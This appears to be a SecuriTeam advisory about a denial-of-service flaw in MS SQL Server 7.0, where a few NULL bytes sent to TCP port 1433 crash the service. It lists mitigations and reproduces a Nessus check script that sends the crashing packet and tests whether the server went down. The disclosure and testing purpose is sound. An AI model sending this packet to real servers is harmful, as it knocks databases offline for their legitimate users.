SecuriTeam - MS SQL Server vulnerable to "Magic" packet attack

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

CanSecWest 2012

2nd Annual Cyber Security

Hack In Paris

MS SQL Server 7.0 can be cause to crash silently when it is sent a TCP packet that contains more than 2 NULLs as the TCP data. This can be used to effectively cause a Denial of Service attack against the MS SQL Server.

Credit:
The information has been provided by: Kevork Belian.

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable systems:
MS SQL Server version 7.00.699

If the MS SQL Server TCP/IP net library is enabled, any 3 or greater NULL bytes in the TCP data can be used to crash the MS SQL Server listening on the TCP port 1433. The Microsoft SQL Server raises an event 17055 in the Event log (fatal exception EXCEPTION_ACCESS VIOLATION).

Solution:
1) Block all non-trusted incoming traffic on port 1433.
2) Disable the MS SQL Sever TCP/IP net library (if it's not needed).
3) A normal service restart will restart the MS SQL Server after such an attack.

The following Nessus script can be used to test for this vulnerability:
#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
name["english"] = "Microsoft's SQL TCP/IP denial of service";
script_name(english:name["english"]);

desc["english"] = "
The remote Microsoft SQL server can be shut down when it is
sent a TCP packet containing more than 2 NULLs.

An attacker may use this problem to prevent it from
being used by legitimate clients, thus threatening
your business.

Solution : filter incoming connections to port 1433
Risk factor : Serious";

script_description(english:desc["english"]);

summary["english"] = "Microsoft's SQL TCP/IP DoS";
script_summary(english:summary["english"]);

script_category(ACT_DENIAL);

script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison");
family["english"] = "Denial of Service";
script_family(english:family["english"]);
script_require_ports(1433, 139);
exit(0);
}

#
# The script code starts here
#

if (get_port_state(1433))
{
soc = open_sock_tcp(1433);
if (soc)
{
  data = raw_string(0x00, 0x00, 0x00, 0x00, 0x00, 0x00);
  send(socket:soc, data:data);
  close(soc);
  sleep(2);
  soc2 = open_sock_tcp(1433);
  if(!soc2)security_hole(1433);
  else close(soc2);
}
}

blog comments powered by Disqus

	Microsoft Windows shmedia.dll Division By Zero, Explore.exe DOS Exploit
	IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS
	Progea Movicon TCPUploadServer Remote Exploit
	Trango Broadband Wireless Rogue SU Authentication Bug
	Exposing HMS HICP Protocol and Intellicom NetBiterConfig.exe Remote Buffer Overflow
	Family Connections Multiple Remote Vulnerabilities
	VideoCache vccleaner Root Vulnerability
	QuickHeal Antivirus 2010 Local Privilege Escalation
	DubSite CMS Cross Site Request Forgery Vulnerability
	SonicWall Global Management System XSS Vulnerability
	Sonicwall NSA E7500 XSS Vulnerability
	Juniper Security Threat Response Manager XSS Vulnerability
	Hacking CSRF Tokens using CSS History Hack
	Sun Java System Identiy Manager Users Enumeration
	Microsoft Internet Explorer XML Buffer Overflow (Exploit)